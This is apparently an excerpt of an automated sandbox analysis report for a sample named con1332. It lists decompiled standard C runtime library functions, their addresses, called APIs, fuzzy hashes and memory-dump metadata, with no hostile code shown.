                                                                                                                                                                                                                                    0x00405d7b
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d87
                                                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                                                    0x00405d91
                                                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                                                    0x00405d9b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405da1
                                                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                                                    0x00405d59
                                                                                                                                                                                                                                    0x00405d5c
                                                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d67
                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 208892515-0
                                                                                                                                                                                                                                    • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                                                    • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                    			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                                                                                                    0x0040baaa
                                                                                                                                                                                                                                    0x0040baba
                                                                                                                                                                                                                                    0x0040bae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bac1
                                                                                                                                                                                                                                    0x0040bac1
                                                                                                                                                                                                                                    0x0040bac4
                                                                                                                                                                                                                                    0x0040bac6
                                                                                                                                                                                                                                    0x0040bae7
                                                                                                                                                                                                                                    0x0040baea
                                                                                                                                                                                                                                    0x0040baec
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040baee
                                                                                                                                                                                                                                    0x0040baf3
                                                                                                                                                                                                                                    0x0040baf6
                                                                                                                                                                                                                                    0x0040baf9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bafe
                                                                                                                                                                                                                                    0x0040bb02
                                                                                                                                                                                                                                    0x0040bb09
                                                                                                                                                                                                                                    0x0040bb0c
                                                                                                                                                                                                                                    0x0040bb0f
                                                                                                                                                                                                                                    0x0040bb11
                                                                                                                                                                                                                                    0x0040bb1b
                                                                                                                                                                                                                                    0x0040bb13
                                                                                                                                                                                                                                    0x0040bb16
                                                                                                                                                                                                                                    0x0040bb16
                                                                                                                                                                                                                                    0x0040bb22
                                                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                                                    0x0040bbe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                                                    0x0040bb2d
                                                                                                                                                                                                                                    0x0040bb2d
                                                                                                                                                                                                                                    0x0040bb33
                                                                                                                                                                                                                                    0x0040bb64
                                                                                                                                                                                                                                    0x0040bb64
                                                                                                                                                                                                                                    0x0040bb67
                                                                                                                                                                                                                                    0x0040bbc0
                                                                                                                                                                                                                                    0x0040bbc7
                                                                                                                                                                                                                                    0x0040bbca
                                                                                                                                                                                                                                    0x0040bbf5
                                                                                                                                                                                                                                    0x0040bbf5
                                                                                                                                                                                                                                    0x0040bbf7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbfb
                                                                                                                                                                                                                                    0x0040bbcc
                                                                                                                                                                                                                                    0x0040bbcf
                                                                                                                                                                                                                                    0x0040bbd2
                                                                                                                                                                                                                                    0x0040bbd3
                                                                                                                                                                                                                                    0x0040bbd6
                                                                                                                                                                                                                                    0x0040bbd8
                                                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbd8
                                                                                                                                                                                                                                    0x0040bb69
                                                                                                                                                                                                                                    0x0040bb6b
                                                                                                                                                                                                                                    0x0040bb78
                                                                                                                                                                                                                                    0x0040bb78
                                                                                                                                                                                                                                    0x0040bb7c
                                                                                                                                                                                                                                    0x0040bb7e
                                                                                                                                                                                                                                    0x0040bb82
                                                                                                                                                                                                                                    0x0040bb84
                                                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                                                    0x0040bb89
                                                                                                                                                                                                                                    0x0040bb8a
                                                                                                                                                                                                                                    0x0040bb94
                                                                                                                                                                                                                                    0x0040bb95
                                                                                                                                                                                                                                    0x0040bb9a
                                                                                                                                                                                                                                    0x0040bb9d
                                                                                                                                                                                                                                    0x0040bba0
                                                                                                                                                                                                                                    0x0040bc03
                                                                                                                                                                                                                                    0x0040bc03
                                                                                                                                                                                                                                    0x0040bc07
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bba2
                                                                                                                                                                                                                                    0x0040bba2
                                                                                                                                                                                                                                    0x0040bba4
                                                                                                                                                                                                                                    0x0040bba6
                                                                                                                                                                                                                                    0x0040bba8
                                                                                                                                                                                                                                    0x0040bba8
                                                                                                                                                                                                                                    0x0040bbaa
                                                                                                                                                                                                                                    0x0040bbad
                                                                                                                                                                                                                                    0x0040bbaf
                                                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                                                    0x0040bba0
                                                                                                                                                                                                                                    0x0040bb6e
                                                                                                                                                                                                                                    0x0040bb74
                                                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                                                    0x0040bb35
                                                                                                                                                                                                                                    0x0040bb38
                                                                                                                                                                                                                                    0x0040bb3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bb3c
                                                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                                                    0x0040bb42
                                                                                                                                                                                                                                    0x0040bb44
                                                                                                                                                                                                                                    0x0040bb46
                                                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                                                    0x0040bb50
                                                                                                                                                                                                                                    0x0040bb55
                                                                                                                                                                                                                                    0x0040bb58
                                                                                                                                                                                                                                    0x0040bb5a
                                                                                                                                                                                                                                    0x0040bb5d
                                                                                                                                                                                                                                    0x0040bb5f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                                                    0x0040bacd
                                                                                                                                                                                                                                    0x0040bace
                                                                                                                                                                                                                                    0x0040bacf
                                                                                                                                                                                                                                    0x0040bad0
                                                                                                                                                                                                                                    0x0040bad1
                                                                                                                                                                                                                                    0x0040bad2
                                                                                                                                                                                                                                    0x0040bad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040badd

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                                                    • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                                                    • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3240763771-0
                                                                                                                                                                                                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                    • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF5F67 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 208892515-0
                                                                                                                                                                                                                                    • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                                                    • Instruction ID: 56c7d3bdd436992d3d28e01f508f1e1f9e4f09eb4417eaf06df5dfd70bf7cb3f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11419372604B114AD6B0863D998471673EADF90358F250A99EFB682F90E731E449CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFBD11 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1291973410-0
                                                                                                                                                                                                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                    • Instruction ID: 42f9615f664fbd0a58d81adf719723810992d2a7a93973b0e1fcaf0098cf3d2b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2412A36A00608EFDB94DF69C8805AEF7B6EF8832CF2485A9D75597140E730D948CB41
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                                                                                    0x004152a9
                                                                                                                                                                                                                                    0x004152b0
                                                                                                                                                                                                                                    0x004152c7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152b7
                                                                                                                                                                                                                                    0x004152b9
                                                                                                                                                                                                                                    0x004152d3
                                                                                                                                                                                                                                    0x004152d8
                                                                                                                                                                                                                                    0x004152db
                                                                                                                                                                                                                                    0x004152de
                                                                                                                                                                                                                                    0x00415307
                                                                                                                                                                                                                                    0x0041530e
                                                                                                                                                                                                                                    0x00415310
                                                                                                                                                                                                                                    0x00415391
                                                                                                                                                                                                                                    0x004153ac
                                                                                                                                                                                                                                    0x004153ae
                                                                                                                                                                                                                                    0x004152ee
                                                                                                                                                                                                                                    0x004152ee
                                                                                                                                                                                                                                    0x004152f1
                                                                                                                                                                                                                                    0x004152f3
                                                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152fc
                                                                                                                                                                                                                                    0x00415370
                                                                                                                                                                                                                                    0x00415370
                                                                                                                                                                                                                                    0x00415375
                                                                                                                                                                                                                                    0x0041537b
                                                                                                                                                                                                                                    0x0041537e
                                                                                                                                                                                                                                    0x00415380
                                                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415387
                                                                                                                                                                                                                                    0x00415312
                                                                                                                                                                                                                                    0x00415315
                                                                                                                                                                                                                                    0x0041531b
                                                                                                                                                                                                                                    0x0041531e
                                                                                                                                                                                                                                    0x00415345
                                                                                                                                                                                                                                    0x00415348
                                                                                                                                                                                                                                    0x0041534e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415350
                                                                                                                                                                                                                                    0x00415353
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415355
                                                                                                                                                                                                                                    0x00415355
                                                                                                                                                                                                                                    0x0041535b
                                                                                                                                                                                                                                    0x0041535e
                                                                                                                                                                                                                                    0x004152cc
                                                                                                                                                                                                                                    0x004152cc
                                                                                                                                                                                                                                    0x00415367
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415367
                                                                                                                                                                                                                                    0x00415320
                                                                                                                                                                                                                                    0x00415323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415327
                                                                                                                                                                                                                                    0x00415338
                                                                                                                                                                                                                                    0x0041533e
                                                                                                                                                                                                                                    0x00415340
                                                                                                                                                                                                                                    0x00415343
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00415343
                                                                                                                                                                                                                                    0x004152e0
                                                                                                                                                                                                                                    0x004152e3
                                                                                                                                                                                                                                    0x004152e5
                                                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                                                    0x004152b9

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                                                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                    • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C05506 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C0553A
                                                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 02C0556E
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C0559F
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C0560D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                                                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                    • Instruction ID: 617b3922c88b9b94f4ac194e8fa1c596134cdede7e75f8295294275546ce3ea2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B31A231A14245EFDB20DF64C8C4ABE3BA6FF41394F9445A9E5658B1E0E730DA40DF50
                                                                                                                                                                                                                                    Uniqueness

